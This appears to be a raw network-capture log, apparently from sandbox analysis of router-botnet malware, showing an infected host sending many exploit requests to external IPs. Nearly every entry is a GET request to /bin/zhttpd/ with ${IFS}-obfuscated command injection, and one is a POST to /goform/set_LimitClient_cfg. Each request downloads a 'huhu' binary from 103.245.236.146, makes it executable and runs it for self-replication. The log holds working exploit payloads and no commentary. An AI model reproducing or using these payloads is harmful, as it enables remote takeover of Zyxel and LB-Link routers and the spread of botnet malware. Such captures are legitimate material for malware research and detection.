                                      Jan 19, 2024 17:29:37.887028933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5817192.168.2.144964093.33.149.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887073994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5818192.168.2.143436024.74.2.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887111902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5819192.168.2.144030020.77.246.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887166977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5820192.168.2.1453080109.163.197.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887222052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5821192.168.2.145643248.25.124.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887268066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5822192.168.2.144820882.127.149.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887295008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5823192.168.2.1440714167.78.104.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887336969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5824192.168.2.14582308.90.127.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887376070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5825192.168.2.144867264.26.83.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887398958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5826192.168.2.143957282.63.187.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887437105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5827192.168.2.1443596163.178.227.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887500048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5828192.168.2.1448644193.185.2.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887533903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5829192.168.2.1447218141.133.123.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887568951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5830192.168.2.1449394120.113.110.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887610912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5831192.168.2.1451862211.136.77.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887645960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5832192.168.2.144284064.154.55.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887689114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5833192.168.2.1459710149.0.109.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887717009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5834192.168.2.145479674.93.178.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887763977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5835192.168.2.144846235.147.194.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887789011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5836192.168.2.1449460180.148.39.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887834072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5837192.168.2.145150025.91.172.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887878895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5838192.168.2.1447718145.82.86.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887923002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5839192.168.2.144377651.17.193.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.887984991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5840192.168.2.143847050.61.171.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.888021946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5841192.168.2.144732620.185.208.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.888062000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5842192.168.2.1453520106.125.254.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.888091087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5843192.168.2.1445198157.231.207.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.888129950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5844192.168.2.1452230141.197.92.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.888144970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5845192.168.2.144384678.229.94.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.888200045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5846192.168.2.1447070205.225.62.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.888256073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5847192.168.2.1433162110.42.251.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.888281107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5848192.168.2.145807667.119.115.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.888339996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5849192.168.2.1443942163.125.103.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.888369083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5850192.168.2.1442866165.49.173.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.888417006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5851192.168.2.1450840137.66.131.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.888448954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5852192.168.2.1440006206.187.162.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.891932011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5853192.168.2.14427124.199.129.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.891980886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5854192.168.2.144440465.154.38.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.892036915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5855192.168.2.1435548218.123.237.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.892085075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5856192.168.2.1441438176.199.41.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.892106056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5857192.168.2.143739632.26.5.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.892153978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5858192.168.2.144151259.183.19.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.892194033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5859192.168.2.1438772173.100.86.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.892227888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5860192.168.2.1451158149.248.205.1488080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.841413975 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5861192.168.2.143824460.35.83.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.897924900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5862192.168.2.1443586147.179.123.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.897959948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5863192.168.2.1436882150.234.121.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898000956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5864192.168.2.143330094.209.178.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898045063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5865192.168.2.1435546121.14.17.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898071051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5866192.168.2.1460820144.23.197.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898108006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5867192.168.2.1440124172.166.195.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898164034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5868192.168.2.143694850.222.1.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898201942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5869192.168.2.144583272.110.93.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898251057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5870192.168.2.1432994102.108.118.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898279905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5871192.168.2.1434362176.40.39.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898324966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5872192.168.2.145105214.209.147.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898356915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5873192.168.2.1448706211.87.163.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898406029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5874192.168.2.1450978120.86.36.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898463011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5875192.168.2.1456590218.249.66.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898495913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5876192.168.2.1439410165.147.241.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898536921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5877192.168.2.144935669.192.185.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898601055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5878192.168.2.1455986159.224.23.223443
                                      TimestampBytes transferredDirectionData
